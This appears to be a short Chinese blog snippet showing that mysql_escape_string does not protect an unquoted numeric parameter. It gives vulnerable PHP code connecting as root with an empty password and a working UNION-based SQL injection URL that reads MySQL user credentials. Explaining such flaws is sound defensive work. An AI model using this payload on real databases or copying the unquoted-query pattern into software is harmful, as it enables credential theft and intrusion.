$id = mysql_escape_string($_GET['a']);
$link = mysql_connect('localhost', 'root', '') or die("connect failed");
$sql = "SELECT id,2 FROM test.test WHERE id = $id";
$rt = mysql_query($sql);
url:index.php?a=3524710/**/and/**/1=0/**/union/**/select/**/1,concat(user,0x3a,password)/**/from/**/mysql.user/**/where/**/user=substring_index(current_user(),char(64),1)mysql_escape_string不可靠
最新推荐文章于 2022-09-23 16:44:38 发布